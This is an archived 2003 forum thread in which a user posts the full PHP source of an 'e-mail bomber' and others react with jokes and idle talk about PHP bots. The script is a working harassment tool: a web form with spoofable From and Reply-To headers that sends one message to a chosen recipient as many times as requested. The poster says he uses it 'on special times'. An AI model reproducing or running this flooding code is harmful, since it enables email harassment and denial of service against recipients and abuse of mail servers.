• Welcome to Valhalla Legends Archive.
 

PHP E-Mail Bomber Huh.

Started by Archangel., December 25, 2003, 12:08 PM

Previous topic - Next topic

Archangel.

Huh, Php e-Mail Bomber:
   <?php
   if ($submit == "go!"){
   $extra = "From: $from\r\nReply-To: $replyto\r\n";
   echo "
   <table>
   <tr>
   <td>To:</td>
   <td>$recipient</td>
   </tr>
   <tr>
   <td>From:</td>
   <td>$from</td>
   </tr>
   <tr>
   <td>Reply-to:</td>
   <td>$replyto</td>
   </tr>
   <tr>
   <td>Subject:</td>
   <td>$subject</td>
   </tr>
   <tr>
   <td>Message:</td>
   <td>$message</td>
   </tr>
   <tr>
   <td>Number to send:</td>
   <td>$number</td>
   </tr>
   </table>
   <br>Sending... ";
   for ($i = 0; $i < $number; $i++){
   mail ($recipient, $subject, $message, $extra);
   }
   echo "done</body></html>";
   }
   else{
   echo "
   <form method='post' action='emailbomber.php'>
   <table>
   <tr>
   <td>To:</td>
   <td><input type='text' name='recipient'></input></td>
   </tr>
   <tr>
   <td>From:</td>
   <td><input type='text' name='from'></input></td>
   </tr>
   <tr>
   <td>Reply-to:</td>
   <td><input type='text' name='replyto'></input></td>
   </tr>
   <tr>
   <td>Subject:</td>
   <td><input type='text' name='subject'></input></td>
   </tr>
   <tr>
   <td>Message:</td>
   <td><input type='text' name='message'></input></td>
   </tr>
   <tr>
   <td>Number to send:</td>
   <td><input type='text' name='number'></input></td>
   </tr>
   </table>
   <input type='submit' name='submit' value='go!'></input>
   </form> ";
   }
   ?>
aka: Archangel, i can't login into the account or request the password, weird problem.

quasi-modo

Would you be running your own smtp? Most hosts would get pissed by flooding their smtp with spam :P
WAR EAGLE!
Quote(00:04:08) zdv17: yeah i quit doing that stuff cause it jacked up the power bill too much
(00:04:19) nick is a turtle: Right now im not paying the power bill though
(00:04:33) nick is a turtle: if i had to pay the electric bill
(00:04:47) nick is a turtle: id hibernate when i go to class
(00:04:57) nick is a turtle: or at least when i go to sleep
(00:08:50) zdv17: hibernating in class is cool.. esp. when you leave a drool puddle

Archangel.

Well, not really lol.. I just use it on special times lol..
aka: Archangel, i can't login into the account or request the password, weird problem.

Banana fanna fo fanna

Wow, someone thinks they're too cool for school.

Archangel.

Im soooo bored..,
Hmm it isnt possible to make a php bot? right?
aka: Archangel, i can't login into the account or request the password, weird problem.

Banana fanna fo fanna

It's possible, but probably not the ideal language to write one in.

quasi-modo

How would you do that, would you use ssl with php?
WAR EAGLE!
Quote(00:04:08) zdv17: yeah i quit doing that stuff cause it jacked up the power bill too much
(00:04:19) nick is a turtle: Right now im not paying the power bill though
(00:04:33) nick is a turtle: if i had to pay the electric bill
(00:04:47) nick is a turtle: id hibernate when i go to class
(00:04:57) nick is a turtle: or at least when i go to sleep
(00:08:50) zdv17: hibernating in class is cool.. esp. when you leave a drool puddle

Banana fanna fo fanna


Archangel.

Allot of people have told me u cant like shadowed, and he is really good at this, i told him about the sockets long time ago and he told me dont even try to :o.
aka: Archangel, i can't login into the account or request the password, weird problem.

CrAzY

Would you really want to post a bomber on a website... Might be arrested :)
CrAzY

SNiFFeR

I doubt you can get arrested for showing someone how something is done.

quasi-modo

its a simple feedback form, its only harmful when you put it in a loop :P
WAR EAGLE!
Quote(00:04:08) zdv17: yeah i quit doing that stuff cause it jacked up the power bill too much
(00:04:19) nick is a turtle: Right now im not paying the power bill though
(00:04:33) nick is a turtle: if i had to pay the electric bill
(00:04:47) nick is a turtle: id hibernate when i go to class
(00:04:57) nick is a turtle: or at least when i go to sleep
(00:08:50) zdv17: hibernating in class is cool.. esp. when you leave a drool puddle